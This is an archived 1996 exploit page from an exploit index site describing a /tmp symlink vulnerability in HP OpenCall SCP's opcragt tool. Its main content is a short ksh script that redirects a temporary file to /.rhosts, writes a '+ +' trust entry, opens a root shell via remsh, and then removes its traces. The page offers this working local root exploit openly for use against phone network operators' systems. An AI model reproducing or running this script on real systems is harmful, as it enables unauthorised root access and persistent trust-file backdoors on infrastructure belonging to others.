HP OpenCall SCP /opt/OV/bin/OpC/opcragt exploit

Summary

Description:	Standard /tmp symlink vulnerability
Author:	Dog Catcher
Compromise:	root on a potentially very cool system! (local)
Vulnerable Systems:	many phone network operators use OpenCall SCP
Date:	October 1996
Notes:	See the SOD HP Bug of the Week page

Details

Exploit:


#!/bin/ksh
#
# opchack (C) 1996 Dog Catcher
# if /.rhosts does not exist then this will create one and
# plop a nice little + + inside

rm -f /tmp/last_uuid
ln -s /.rhosts /tmp/last_uuid
/opt/OV/bin/OpC/opcragt `uname -n`

echo '+ +' > /.rhosts

remsh `uname -n` -l root ksh -i

remsh `uname -n` -l root rm -f /.rhosts
rm /tmp/last_uuid

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:

All OS's	Linux	Solaris/SunOS	Micro$oft
*BSD	Macintosh	AIX	IRIX
ULTRIX/Digital UNIX	HP/UX	SCO	Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: